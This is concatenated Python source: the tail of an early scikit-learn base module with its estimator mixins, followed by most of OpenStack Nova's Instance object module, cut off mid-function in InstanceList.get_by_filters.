name, sub_name = split
assert name in valid_params, ('Invalid parameter %s '
'for estimator %s' %
(name, self))
sub_object = valid_params[name]
assert hasattr(sub_object, '_get_params'), (
'Parameter %s of %s is not an estimator, cannot set '
'sub parameter %s' %
(sub_name, self.__class__.__name__, sub_name)
)
sub_object.set_params(**{sub_name: value})
else:
# simple objects case
assert key in valid_params, ('Invalid parameter %s '
'for estimator %s' %
(key, self.__class__.__name__))
setattr(self, key, value)
return self
def _set_params(self, **params):
if params != {}:
warnings.warn("Passing estimator parameters to fit is deprecated;"
" use set_params instead",
category=DeprecationWarning)
return self.set_params(**params)
def __repr__(self):
class_name = self.__class__.__name__
return '%s(%s)' % (
class_name,
_pprint(self._get_params(deep=False),
offset=len(class_name),
),
)
def __str__(self):
class_name = self.__class__.__name__
return '%s(%s)' % (
class_name,
_pprint(self._get_params(deep=True),
offset=len(class_name),
printer=str,
),
)
###############################################################################
class ClassifierMixin(object):
"""Mixin class for all classifiers in scikit-learn"""
def score(self, X, y):
"""Returns the mean error rate on the given test data and labels.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training set.
y : array-like, shape = [n_samples]
Labels for X.
Returns
-------
z : float
"""
return np.mean(self.predict(X) == y)
###############################################################################
class RegressorMixin(object):
"""Mixin class for all regression estimators in the scikit learn"""
def score(self, X, y):
"""Returns the coefficient of determination of the prediction
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training set.
y : array-like, shape = [n_samples]
Returns
-------
z : float
"""
return r2_score(y, self.predict(X))
###############################################################################
class TransformerMixin(object):
"""Mixin class for all transformers in the scikit learn"""
def fit_transform(self, X, y=None, **fit_params):
"""Fit to data, then transform it
Fits transformer to X and y with optional parameters fit_params
and returns a transformed version of X.
Parameters
----------
X : numpy array of shape [n_samples, n_features]
Training set.
y : numpy array of shape [n_samples]
Target values.
Returns
-------
X_new : numpy array of shape [n_samples, n_features_new]
Transformed array.
Note
-----
This method just calls fit and transform consecutively, i.e., it is not
an optimized implementation of fit_transform, unlike other transformers
such as PCA.
"""
if y is None:
# fit method of arity 1 (unsupervised transformation)
return self.fit(X, **fit_params).transform(X)
else:
# fit method of arity 2 (supervised transformation)
return self.fit(X, y, **fit_params).transform(X)
###############################################################################
# XXX: Temporary solution to figure out if an estimator is a classifier
def _get_sub_estimator(estimator):
"""Returns the final estimator if there is any."""
if hasattr(estimator, 'estimator'):
# GridSearchCV and other CV-tuned estimators
return _get_sub_estimator(estimator.estimator)
if hasattr(estimator, 'steps'):
# Pipeline
return _get_sub_estimator(estimator.steps[-1][1])
return estimator
def is_classifier(estimator):
"""Returns True if the given estimator is (probably) a classifier."""
estimator = _get_sub_estimator(estimator)
return isinstance(estimator, ClassifierMixin)
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from nova.cells import opts as cells_opts
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import utils as cells_utils
from nova import db
from nova import exception
from nova.i18n import _LE
from nova import notifications
from nova import objects
from nova.objects import base
from nova.objects import fields
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# List of fields that can be joined in DB layer.
_INSTANCE_OPTIONAL_JOINED_FIELDS = ['metadata', 'system_metadata',
'info_cache', 'security_groups',
'pci_devices', 'tags']
# These are fields that are optional but don't translate to db columns
_INSTANCE_OPTIONAL_NON_COLUMN_FIELDS = ['fault', 'flavor', 'old_flavor',
'new_flavor', 'ec2_ids']
# These are fields that are optional and in instance_extra
_INSTANCE_EXTRA_FIELDS = ['numa_topology', 'pci_requests',
'flavor', 'vcpu_model', 'migration_context']
# These are fields that can be specified as expected_attrs
INSTANCE_OPTIONAL_ATTRS = (_INSTANCE_OPTIONAL_JOINED_FIELDS +
_INSTANCE_OPTIONAL_NON_COLUMN_FIELDS +
_INSTANCE_EXTRA_FIELDS)
# These are fields that most query calls load by default
INSTANCE_DEFAULT_FIELDS = ['metadata', 'system_metadata',
'info_cache', 'security_groups']
def _expected_cols(expected_attrs):
"""Return expected_attrs that are columns needing joining.
NB: This function may modify expected_attrs if one
requested attribute requires another.
"""
if not expected_attrs:
return expected_attrs
simple_cols = [attr for attr in expected_attrs
if attr in _INSTANCE_OPTIONAL_JOINED_FIELDS]
complex_cols = ['extra.%s' % field
for field in _INSTANCE_EXTRA_FIELDS
if field in expected_attrs]
if complex_cols:
simple_cols.append('extra')
simple_cols = [x for x in simple_cols if x not in _INSTANCE_EXTRA_FIELDS]
return simple_cols + complex_cols
_NO_DATA_SENTINEL = object()
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class Instance(base.NovaPersistentObject, base.NovaObject,
base.NovaObjectDictCompat):
# Version 2.0: Initial version
VERSION = '2.0'
fields = {
'id': fields.IntegerField(),
'user_id': fields.StringField(nullable=True),
'project_id': fields.StringField(nullable=True),
'image_ref': fields.StringField(nullable=True),
'kernel_id': fields.StringField(nullable=True),
'ramdisk_id': fields.StringField(nullable=True),
'hostname': fields.StringField(nullable=True),
'launch_index': fields.IntegerField(nullable=True),
'key_name': fields.StringField(nullable=True),
'key_data': fields.StringField(nullable=True),
'power_state': fields.IntegerField(nullable=True),
'vm_state': fields.StringField(nullable=True),
'task_state': fields.StringField(nullable=True),
'memory_mb': fields.IntegerField(nullable=True),
'vcpus': fields.IntegerField(nullable=True),
'root_gb': fields.IntegerField(nullable=True),
'ephemeral_gb': fields.IntegerField(nullable=True),
'ephemeral_key_uuid': fields.UUIDField(nullable=True),
'host': fields.StringField(nullable=True),
'node': fields.StringField(nullable=True),
'instance_type_id': fields.IntegerField(nullable=True),
'user_data': fields.StringField(nullable=True),
'reservation_id': fields.StringField(nullable=True),
'launched_at': fields.DateTimeField(nullable=True),
'terminated_at': fields.DateTimeField(nullable=True),
'availability_zone': fields.StringField(nullable=True),
'display_name': fields.StringField(nullable=True),
'display_description': fields.StringField(nullable=True),
'launched_on': fields.StringField(nullable=True),
# NOTE(jdillaman): locked deprecated in favor of locked_by,
# to be removed in Icehouse
'locked': fields.BooleanField(default=False),
'locked_by': fields.StringField(nullable=True),
'os_type': fields.StringField(nullable=True),
'architecture': fields.StringField(nullable=True),
'vm_mode': fields.StringField(nullable=True),
'uuid': fields.UUIDField(),
'root_device_name': fields.StringField(nullable=True),
'default_ephemeral_device': fields.StringField(nullable=True),
'default_swap_device': fields.StringField(nullable=True),
'config_drive': fields.StringField(nullable=True),
'access_ip_v4': fields.IPV4AddressField(nullable=True),
'access_ip_v6': fields.IPV6AddressField(nullable=True),
'auto_disk_config': fields.BooleanField(default=False),
'progress': fields.IntegerField(nullable=True),
'shutdown_terminate': fields.BooleanField(default=False),
'disable_terminate': fields.BooleanField(default=False),
'cell_name': fields.StringField(nullable=True),
'metadata': fields.DictOfStringsField(),
'system_metadata': fields.DictOfNullableStringsField(),
'info_cache': fields.ObjectField('InstanceInfoCache',
nullable=True),
'security_groups': fields.ObjectField('SecurityGroupList'),
'fault': fields.ObjectField('InstanceFault', nullable=True),
'cleaned': fields.BooleanField(default=False),
'pci_devices': fields.ObjectField('PciDeviceList', nullable=True),
'numa_topology': fields.ObjectField('InstanceNUMATopology',
nullable=True),
'pci_requests': fields.ObjectField('InstancePCIRequests',
nullable=True),
'tags': fields.ObjectField('TagList'),
'flavor': fields.ObjectField('Flavor'),
'old_flavor': fields.ObjectField('Flavor', nullable=True),
'new_flavor': fields.ObjectField('Flavor', nullable=True),
'vcpu_model': fields.ObjectField('VirtCPUModel', nullable=True),
'ec2_ids': fields.ObjectField('EC2Ids'),
'migration_context': fields.ObjectField('MigrationContext',
nullable=True)
}
obj_extra_fields = ['name']
def __init__(self, *args, **kwargs):
super(Instance, self).__init__(*args, **kwargs)
self._reset_metadata_tracking()
def _reset_metadata_tracking(self, fields=None):
if fields is None or 'system_metadata' in fields:
self._orig_system_metadata = (dict(self.system_metadata) if
'system_metadata' in self else {})
if fields is None or 'metadata' in fields:
self._orig_metadata = (dict(self.metadata) if
'metadata' in self else {})
def obj_reset_changes(self, fields=None, recursive=False):
super(Instance, self).obj_reset_changes(fields,
recursive=recursive)
self._reset_metadata_tracking(fields=fields)
def obj_what_changed(self):
changes = super(Instance, self).obj_what_changed()
if 'metadata' in self and self.metadata != self._orig_metadata:
changes.add('metadata')
if 'system_metadata' in self and (self.system_metadata !=
self._orig_system_metadata):
changes.add('system_metadata')
return changes
@classmethod
def _obj_from_primitive(cls, context, objver, primitive):
self = super(Instance, cls)._obj_from_primitive(context, objver,
primitive)
self._reset_metadata_tracking()
return self
@property
def name(self):
try:
base_name = CONF.instance_name_template % self.id
except TypeError:
# Support templates like "uuid-%(uuid)s", etc.
info = {}
# NOTE(russellb): Don't use self.iteritems() here, as it will
# result in infinite recursion on the name property.
for key in self.fields:
if key == 'name':
# NOTE(danms): prevent recursion
continue
elif not self.obj_attr_is_set(key):
# NOTE(danms): Don't trigger lazy-loads
continue
info[key] = self[key]
try:
base_name = CONF.instance_name_template % info
except KeyError:
base_name = self.uuid
return base_name
def _flavor_from_db(self, db_flavor):
"""Load instance flavor information from instance_extra."""
flavor_info = jsonutils.loads(db_flavor)
self.flavor = objects.Flavor.obj_from_primitive(flavor_info['cur'])
if flavor_info['old']:
self.old_flavor = objects.Flavor.obj_from_primitive(
flavor_info['old'])
else:
self.old_flavor = None
if flavor_info['new']:
self.new_flavor = objects.Flavor.obj_from_primitive(
flavor_info['new'])
else:
self.new_flavor = None
self.obj_reset_changes(['flavor', 'old_flavor', 'new_flavor'])
@staticmethod
def _from_db_object(context, instance, db_inst, expected_attrs=None):
"""Method to help with migration to objects.
Converts a database entity to a formal object.
"""
instance._context = context
if expected_attrs is None:
expected_attrs = []
# Most of the field names match right now, so be quick
for field in instance.fields:
if field in INSTANCE_OPTIONAL_ATTRS:
continue
elif field == 'deleted':
instance.deleted = db_inst['deleted'] == db_inst['id']
elif field == 'cleaned':
instance.cleaned = db_inst['cleaned'] == 1
else:
instance[field] = db_inst[field]
# NOTE(danms): We can be called with a dict instead of a
# SQLAlchemy object, so we have to be careful here
if hasattr(db_inst, '__dict__'):
have_extra = 'extra' in db_inst.__dict__ and db_inst['extra']
else:
have_extra = 'extra' in db_inst and db_inst['extra']
if 'metadata' in expected_attrs:
instance['metadata'] = utils.instance_meta(db_inst)
if 'system_metadata' in expected_attrs:
instance['system_metadata'] = utils.instance_sys_meta(db_inst)
if 'fault' in expected_attrs:
instance['fault'] = (
objects.InstanceFault.get_latest_for_instance(
context, instance.uuid))
if 'numa_topology' in expected_attrs:
if have_extra:
instance._load_numa_topology(
db_inst['extra'].get('numa_topology'))
else:
instance.numa_topology = None
if 'pci_requests' in expected_attrs:
if have_extra:
instance._load_pci_requests(
db_inst['extra'].get('pci_requests'))
else:
instance.pci_requests = None
if 'vcpu_model' in expected_attrs:
if have_extra:
instance._load_vcpu_model(
db_inst['extra'].get('vcpu_model'))
else:
instance.vcpu_model = None
if 'ec2_ids' in expected_attrs:
instance._load_ec2_ids()
if 'migration_context' in expected_attrs:
if have_extra:
instance._load_migration_context(
db_inst['extra'].get('migration_context'))
else:
instance.migration_context = None
if 'info_cache' in expected_attrs:
if db_inst.get('info_cache') is None:
instance.info_cache = None
elif not instance.obj_attr_is_set('info_cache'):
# TODO(danms): If this ever happens on a backlevel instance
# passed to us by a backlevel service, things will break
instance.info_cache = objects.InstanceInfoCache(context)
if instance.info_cache is not None:
instance.info_cache._from_db_object(context,
instance.info_cache,
db_inst['info_cache'])
if any([x in expected_attrs for x in ('flavor',
'old_flavor',
'new_flavor')]):
if have_extra and db_inst['extra'].get('flavor'):
instance._flavor_from_db(db_inst['extra']['flavor'])
# TODO(danms): If we are updating these on a backlevel instance,
# we'll end up sending back new versions of these objects (see
# above note for new info_caches
if 'pci_devices' in expected_attrs:
pci_devices = base.obj_make_list(
context, objects.PciDeviceList(context),
objects.PciDevice, db_inst['pci_devices'])
instance['pci_devices'] = pci_devices
if 'security_groups' in expected_attrs:
sec_groups = base.obj_make_list(
context, objects.SecurityGroupList(context),
objects.SecurityGroup, db_inst.get('security_groups', []))
instance['security_groups'] = sec_groups
if 'tags' in expected_attrs:
tags = base.obj_make_list(
context, objects.TagList(context),
objects.Tag, db_inst['tags'])
instance['tags'] = tags
instance.obj_reset_changes()
return instance
@base.remotable_classmethod
def get_by_uuid(cls, context, uuid, expected_attrs=None, use_slave=False):
if expected_attrs is None:
expected_attrs = ['info_cache', 'security_groups']
columns_to_join = _expected_cols(expected_attrs)
db_inst = db.instance_get_by_uuid(context, uuid,
columns_to_join=columns_to_join,
use_slave=use_slave)
return cls._from_db_object(context, cls(), db_inst,
expected_attrs)
@base.remotable_classmethod
def get_by_id(cls, context, inst_id, expected_attrs=None):
if expected_attrs is None:
expected_attrs = ['info_cache', 'security_groups']
columns_to_join = _expected_cols(expected_attrs)
db_inst = db.instance_get(context, inst_id,
columns_to_join=columns_to_join)
return cls._from_db_object(context, cls(), db_inst,
expected_attrs)
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
updates = self.obj_get_changes()
expected_attrs = [attr for attr in INSTANCE_DEFAULT_FIELDS
if attr in updates]
if 'security_groups' in updates:
updates['security_groups'] = [x.name for x in
updates['security_groups']]
if 'info_cache' in updates:
updates['info_cache'] = {
'network_info': updates['info_cache'].network_info.json()
}
updates['extra'] = {}
numa_topology = updates.pop('numa_topology', None)
if numa_topology:
expected_attrs.append('numa_topology')
updates['extra']['numa_topology'] = numa_topology._to_json()
pci_requests = updates.pop('pci_requests', None)
if pci_requests:
expected_attrs.append('pci_requests')
updates['extra']['pci_requests'] = (
pci_requests.to_json())
flavor = updates.pop('flavor', None)
if flavor:
expected_attrs.append('flavor')
old = ((self.obj_attr_is_set('old_flavor') and
self.old_flavor) and
self.old_flavor.obj_to_primitive() or None)
new = ((self.obj_attr_is_set('new_flavor') and
self.new_flavor) and
self.new_flavor.obj_to_primitive() or None)
flavor_info = {
'cur': self.flavor.obj_to_primitive(),
'old': old,
'new': new,
}
updates['extra']['flavor'] = jsonutils.dumps(flavor_info)
vcpu_model = updates.pop('vcpu_model', None)
if vcpu_model:
expected_attrs.append('vcpu_model')
updates['extra']['vcpu_model'] = (
jsonutils.dumps(vcpu_model.obj_to_primitive()))
db_inst = db.instance_create(self._context, updates)
self._from_db_object(self._context, self, db_inst, expected_attrs)
@base.remotable
def destroy(self):
if not self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='destroy',
reason='already destroyed')
if not self.obj_attr_is_set('uuid'):
raise exception.ObjectActionError(action='destroy',
reason='no uuid')
if not self.obj_attr_is_set('host') or not self.host:
# NOTE(danms): If our host is not set, avoid a race
constraint = db.constraint(host=db.equal_any(None))
else:
constraint = None
cell_type = cells_opts.get_cell_type()
if cell_type is not None:
stale_instance = self.obj_clone()
try:
db_inst = db.instance_destroy(self._context, self.uuid,
constraint=constraint)
self._from_db_object(self._context, self, db_inst)
except exception.ConstraintNotMet:
raise exception.ObjectActionError(action='destroy',
reason='host changed')
if cell_type == 'compute':
cells_api = cells_rpcapi.CellsAPI()
cells_api.instance_destroy_at_top(self._context, stale_instance)
delattr(self, base.get_attrname('id'))
def _save_info_cache(self, context):
if self.info_cache:
with self.info_cache.obj_alternate_context(context):
self.info_cache.save()
def _save_security_groups(self, context):
security_groups = self.security_groups or []
for secgroup in security_groups:
with secgroup.obj_alternate_context(context):
secgroup.save()
self.security_groups.obj_reset_changes()
def _save_fault(self, context):
# NOTE(danms): I don't think we need to worry about this, do we?
pass
def _save_numa_topology(self, context):
if self.numa_topology:
self.numa_topology.instance_uuid = self.uuid
with self.numa_topology.obj_alternate_context(context):
self.numa_topology._save()
else:
objects.InstanceNUMATopology.delete_by_instance_uuid(
context, self.uuid)
def _save_pci_requests(self, context):
# NOTE(danms): No need for this yet.
pass
def _save_pci_devices(self, context):
# NOTE(yjiang5): All devices held by PCI tracker, only PCI tracker
# permitted to update the DB. all change to devices from here will
# be dropped.
pass
def _save_flavor(self, context):
if not any([x in self.obj_what_changed() for x in
('flavor', 'old_flavor', 'new_flavor')]):
return
# FIXME(danms): We can do this smarterly by updating this
# with all the other extra things at the same time
flavor_info = {
'cur': self.flavor.obj_to_primitive(),
'old': (self.old_flavor and
self.old_flavor.obj_to_primitive() or None),
'new': (self.new_flavor and
self.new_flavor.obj_to_primitive() or None),
}
db.instance_extra_update_by_uuid(
context, self.uuid,
{'flavor': jsonutils.dumps(flavor_info)})
self.obj_reset_changes(['flavor', 'old_flavor', 'new_flavor'])
def _save_old_flavor(self, context):
if 'old_flavor' in self.obj_what_changed():
self._save_flavor(context)
def _save_new_flavor(self, context):
if 'new_flavor' in self.obj_what_changed():
self._save_flavor(context)
def _save_vcpu_model(self, context):
# TODO(yjiang5): should merge the db accesses for all the extra
# fields
if 'vcpu_model' in self.obj_what_changed():
if self.vcpu_model:
update = jsonutils.dumps(self.vcpu_model.obj_to_primitive())
else:
update = None
db.instance_extra_update_by_uuid(
context, self.uuid,
{'vcpu_model': update})
def _save_ec2_ids(self, context):
# NOTE(hanlind): Read-only so no need to save this.
pass
def _save_migration_context(self, context):
if self.migration_context:
self.migration_context.instance_uuid = self.uuid
with self.migration_context.obj_alternate_context(context):
self.migration_context._save()
else:
objects.MigrationContext._destroy(context, self.uuid)
@base.remotable
def save(self, expected_vm_state=None,
expected_task_state=None, admin_state_reset=False):
"""Save updates to this instance
Column-wise updates will be made based on the result of
self.what_changed(). If expected_task_state is provided,
it will be checked against the in-database copy of the
instance before updates are made.
:param:context: Security context
:param:expected_task_state: Optional tuple of valid task states
for the instance to be in
:param:expected_vm_state: Optional tuple of valid vm states
for the instance to be in
:param admin_state_reset: True if admin API is forcing setting
of task_state/vm_state
"""
# Store this on the class because _cell_name_blocks_sync is useless
# after the db update call below.
self._sync_cells = not self._cell_name_blocks_sync()
context = self._context
cell_type = cells_opts.get_cell_type()
if cell_type is not None:
# NOTE(comstud): We need to stash a copy of ourselves
# before any updates are applied. When we call the save
# methods on nested objects, we will lose any changes to
# them. But we need to make sure child cells can tell
# what is changed.
#
# We also need to nuke any updates to vm_state and task_state
# unless admin_state_reset is True. compute cells are
# authoritative for their view of vm_state and task_state.
stale_instance = self.obj_clone()
cells_update_from_api = (cell_type == 'api' and self.cell_name and
self._sync_cells)
if cells_update_from_api:
def _handle_cell_update_from_api():
cells_api = cells_rpcapi.CellsAPI()
cells_api.instance_update_from_api(context, stale_instance,
expected_vm_state,
expected_task_state,
admin_state_reset)
updates = {}
changes = self.obj_what_changed()
for field in self.fields:
# NOTE(danms): For object fields, we construct and call a
# helper method like self._save_$attrname()
if (self.obj_attr_is_set(field) and
isinstance(self.fields[field], fields.ObjectField)):
try:
getattr(self, '_save_%s' % field)(context)
except AttributeError:
LOG.exception(_LE('No save handler for %s'), field,
instance=self)
except db_exc.DBReferenceError as exp:
if exp.key != 'instance_uuid':
raise
# NOTE(melwitt): This will happen if we instance.save()
# before an instance.create() and FK constraint fails.
# In practice, this occurs in cells during a delete of
# an unscheduled instance. Otherwise, it could happen
# as a result of bug.
raise exception.InstanceNotFound(instance_id=self.uuid)
elif field in changes:
if (field == 'cell_name' and self[field] is not None and
self[field].startswith(cells_utils.BLOCK_SYNC_FLAG)):
updates[field] = self[field].replace(
cells_utils.BLOCK_SYNC_FLAG, '', 1)
else:
updates[field] = self[field]
if not updates:
if cells_update_from_api:
_handle_cell_update_from_api()
return
# Cleaned needs to be turned back into an int here
if 'cleaned' in updates:
if updates['cleaned']:
updates['cleaned'] = 1
else:
updates['cleaned'] = 0
if expected_task_state is not None:
updates['expected_task_state'] = expected_task_state
if expected_vm_state is not None:
updates['expected_vm_state'] = expected_vm_state
expected_attrs = [attr for attr in _INSTANCE_OPTIONAL_JOINED_FIELDS
if self.obj_attr_is_set(attr)]
if 'pci_devices' in expected_attrs:
# NOTE(danms): We don't refresh pci_devices on save right now
expected_attrs.remove('pci_devices')
# NOTE(alaski): We need to pull system_metadata for the
# notification.send_update() below. If we don't there's a KeyError
# when it tries to extract the flavor.
# NOTE(danms): If we have sysmeta, we need flavor since the caller
# might be expecting flavor information as a result
if 'system_metadata' not in expected_attrs:
expected_attrs.append('system_metadata')
expected_attrs.append('flavor')
old_ref, inst_ref = db.instance_update_and_get_original(
context, self.uuid, updates,
columns_to_join=_expected_cols(expected_attrs))
self._from_db_object(context, self, inst_ref,
expected_attrs=expected_attrs)
if cells_update_from_api:
_handle_cell_update_from_api()
elif cell_type == 'compute':
if self._sync_cells:
cells_api = cells_rpcapi.CellsAPI()
cells_api.instance_update_at_top(context, stale_instance)
def _notify():
# NOTE(danms): We have to be super careful here not to trigger
# any lazy-loads that will unmigrate or unbackport something. So,
# make a copy of the instance for notifications first.
new_ref = self.obj_clone()
notifications.send_update(context, old_ref, new_ref)
# NOTE(alaski): If cell synchronization is blocked it means we have
# already run this block of code in either the parent or child of this
# cell. Therefore this notification has already been sent.
if not self._sync_cells:
_notify = lambda: None # noqa: F811
_notify()
self.obj_reset_changes()
@base.remotable
def refresh(self, use_slave=False):
extra = [field for field in INSTANCE_OPTIONAL_ATTRS
if self.obj_attr_is_set(field)]
current = self.__class__.get_by_uuid(self._context, uuid=self.uuid,
expected_attrs=extra,
use_slave=use_slave)
# NOTE(danms): We orphan the instance copy so we do not unexpectedly
# trigger a lazy-load (which would mean we failed to calculate the
# expected_attrs properly)
current._context = None
for field in self.fields:
if self.obj_attr_is_set(field):
if field == 'info_cache':
self.info_cache.refresh()
elif self[field] != current[field]:
self[field] = current[field]
self.obj_reset_changes()
def _load_generic(self, attrname):
instance = self.__class__.get_by_uuid(self._context,
uuid=self.uuid,
expected_attrs=[attrname])
# NOTE(danms): Never allow us to recursively-load
if instance.obj_attr_is_set(attrname):
self[attrname] = instance[attrname]
else:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='loading %s requires recursion' % attrname)
def _load_fault(self):
self.fault = objects.InstanceFault.get_latest_for_instance(
self._context, self.uuid)
def _load_numa_topology(self, db_topology=None):
if db_topology is not None:
self.numa_topology = \
objects.InstanceNUMATopology.obj_from_db_obj(self.uuid,
db_topology)
else:
try:
self.numa_topology = \
objects.InstanceNUMATopology.get_by_instance_uuid(
self._context, self.uuid)
except exception.NumaTopologyNotFound:
self.numa_topology = None
def _load_pci_requests(self, db_requests=None):
# FIXME: also do this if none!
if db_requests is not None:
self.pci_requests = objects.InstancePCIRequests.obj_from_db(
self._context, self.uuid, db_requests)
else:
self.pci_requests = \
objects.InstancePCIRequests.get_by_instance_uuid(
self._context, self.uuid)
def _load_flavor(self):
instance = self.__class__.get_by_uuid(
self._context, uuid=self.uuid,
expected_attrs=['flavor', 'system_metadata'])
# NOTE(danms): Orphan the instance to make sure we don't lazy-load
# anything below
instance._context = None
self.flavor = instance.flavor
self.old_flavor = instance.old_flavor
self.new_flavor = instance.new_flavor
# NOTE(danms): The query above may have migrated the flavor from
# system_metadata. Since we have it anyway, go ahead and refresh
# our system_metadata from it so that a save will be accurate.
instance.system_metadata.update(self.get('system_metadata', {}))
self.system_metadata = instance.system_metadata
def _load_vcpu_model(self, db_vcpu_model=None):
if db_vcpu_model is None:
self.vcpu_model = objects.VirtCPUModel.get_by_instance_uuid(
self._context, self.uuid)
else:
db_vcpu_model = jsonutils.loads(db_vcpu_model)
self.vcpu_model = objects.VirtCPUModel.obj_from_primitive(
db_vcpu_model)
def _load_ec2_ids(self):
self.ec2_ids = objects.EC2Ids.get_by_instance(self._context, self)
def _load_migration_context(self, db_context=_NO_DATA_SENTINEL):
if db_context is _NO_DATA_SENTINEL:
try:
self.migration_context = (
objects.MigrationContext.get_by_instance_uuid(
self._context, self.uuid))
except exception.MigrationContextNotFound:
self.migration_context = None
elif db_context is None:
self.migration_context = None
else:
self.migration_context = objects.MigrationContext.obj_from_db_obj(
db_context)
def apply_migration_context(self):
if self.migration_context:
self.numa_topology = self.migration_context.new_numa_topology
else:
LOG.debug("Trying to apply a migration context that does not "
"seem to be set for this instance", instance=self)
def revert_migration_context(self):
if self.migration_context:
self.numa_topology = self.migration_context.old_numa_topology
else:
LOG.debug("Trying to revert a migration context that does not "
"seem to be set for this instance", instance=self)
@contextlib.contextmanager
def mutated_migration_context(self):
"""Context manager to temporarily apply the migration context.
Calling .save() from within the context manager means that the mutated
context will be saved which can cause incorrect resource tracking, and
should be avoided.
"""
current_numa_topo = self.numa_topology
self.apply_migration_context()
try:
yield
finally:
self.numa_topology = current_numa_topo
@base.remotable
def drop_migration_context(self):
if self.migration_context:
objects.MigrationContext._destroy(self._context, self.uuid)
self.migration_context = None
def obj_load_attr(self, attrname):
if attrname not in INSTANCE_OPTIONAL_ATTRS:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='attribute %s not lazy-loadable' % attrname)
if not self._context:
raise exception.OrphanedObjectError(method='obj_load_attr',
objtype=self.obj_name())
LOG.debug("Lazy-loading `%(attr)s' on %(name)s uuid %(uuid)s",
{'attr': attrname,
'name': self.obj_name(),
'uuid': self.uuid,
})
# NOTE(danms): We handle some fields differently here so that we
# can be more efficient
if attrname == 'fault':
self._load_fault()
elif attrname == 'numa_topology':
self._load_numa_topology()
elif attrname == 'pci_requests':
self._load_pci_requests()
elif attrname == 'vcpu_model':
self._load_vcpu_model()
elif attrname == 'ec2_ids':
self._load_ec2_ids()
elif attrname == 'migration_context':
self._load_migration_context()
elif 'flavor' in attrname:
self._load_flavor()
else:
# FIXME(comstud): This should be optimized to only load the attr.
self._load_generic(attrname)
self.obj_reset_changes([attrname])
def get_flavor(self, namespace=None):
prefix = ('%s_' % namespace) if namespace is not None else ''
attr = '%sflavor' % prefix
try:
return getattr(self, attr)
except exception.FlavorNotFound:
# NOTE(danms): This only happens in the case where we don't
# have flavor information in sysmeta or extra, and doing
# this triggers a lookup based on our instance_type_id for
# (very) legacy instances. That legacy code expects a None here,
# so emulate it for this helper, even though the actual attribute
# is not nullable.
return None
def set_flavor(self, flavor, namespace=None):
prefix = ('%s_' % namespace) if namespace is not None else ''
attr = '%sflavor' % prefix
if not isinstance(flavor, objects.Flavor):
flavor = objects.Flavor(**flavor)
setattr(self, attr, flavor)
self.save()
def delete_flavor(self, namespace):
prefix = ('%s_' % namespace) if namespace else ''
attr = '%sflavor' % prefix
setattr(self, attr, None)
self.save()
@base.remotable
def delete_metadata_key(self, key):
"""Optimized metadata delete method.
This provides a more efficient way to delete a single metadata
key, instead of just calling instance.save(). This should be called
with the key still present in self.metadata, which it will update
after completion.
"""
db.instance_metadata_delete(self._context, self.uuid, key)
md_was_changed = 'metadata' in self.obj_what_changed()
del self.metadata[key]
self._orig_metadata.pop(key, None)
notifications.send_update(self._context, self, self)
if not md_was_changed:
self.obj_reset_changes(['metadata'])
def _cell_name_blocks_sync(self):
if (self.obj_attr_is_set('cell_name') and
self.cell_name is not None and
self.cell_name.startswith(cells_utils.BLOCK_SYNC_FLAG)):
return True
return False
def _normalize_cell_name(self):
"""Undo skip_cell_sync()'s cell_name modification if applied"""
if not self.obj_attr_is_set('cell_name') or self.cell_name is None:
return
cn_changed = 'cell_name' in self.obj_what_changed()
if self.cell_name.startswith(cells_utils.BLOCK_SYNC_FLAG):
self.cell_name = self.cell_name.replace(
cells_utils.BLOCK_SYNC_FLAG, '', 1)
# cell_name is not normally an empty string, this means it was None
# or unset before cells_utils.BLOCK_SYNC_FLAG was applied.
if len(self.cell_name) == 0:
self.cell_name = None
if not cn_changed:
self.obj_reset_changes(['cell_name'])
@contextlib.contextmanager
def skip_cells_sync(self):
"""Context manager to save an instance without syncing cells.
Temporarily disables the cells syncing logic, if enabled. This should
only be used when saving an instance that has been passed down/up from
another cell in order to avoid passing it back to the originator to be
re-saved.
"""
cn_changed = 'cell_name' in self.obj_what_changed()
if not self.obj_attr_is_set('cell_name') or self.cell_name is None:
self.cell_name = ''
self.cell_name = '%s%s' % (cells_utils.BLOCK_SYNC_FLAG, self.cell_name)
if not cn_changed:
self.obj_reset_changes(['cell_name'])
try:
yield
finally:
self._normalize_cell_name()
def _make_instance_list(context, inst_list, db_inst_list, expected_attrs):
get_fault = expected_attrs and 'fault' in expected_attrs
inst_faults = {}
if get_fault:
# Build an instance_uuid:latest-fault mapping
expected_attrs.remove('fault')
instance_uuids = [inst['uuid'] for inst in db_inst_list]
faults = objects.InstanceFaultList.get_by_instance_uuids(
context, instance_uuids)
for fault in faults:
if fault.instance_uuid not in inst_faults:
inst_faults[fault.instance_uuid] = fault
inst_cls = objects.Instance
inst_list.objects = []
for db_inst in db_inst_list:
inst_obj = inst_cls._from_db_object(
context, inst_cls(context), db_inst,
expected_attrs=expected_attrs)
if get_fault:
inst_obj.fault = inst_faults.get(inst_obj.uuid, None)
inst_list.objects.append(inst_obj)
inst_list.obj_reset_changes()
return inst_list
@base.NovaObjectRegistry.register
class InstanceList(base.ObjectListBase, base.NovaObject):
# Version 2.0: Initial Version
VERSION = '2.0'
fields = {
'objects': fields.ListOfObjectsField('Instance'),
}
@base.remotable_classmethod
def get_by_filters(cls, context, filters,
sort_key='created_at', sort_dir='desc', limit=None,
marker=None, expected_attrs=None, use_slave=False,
sort_keys=None, sort_dirs=None):
if sort_keys or sort_dirs:
db_inst_list = db.instance_get_all_by_filters_sort(
context, filters, limit=limit, marker=marker,
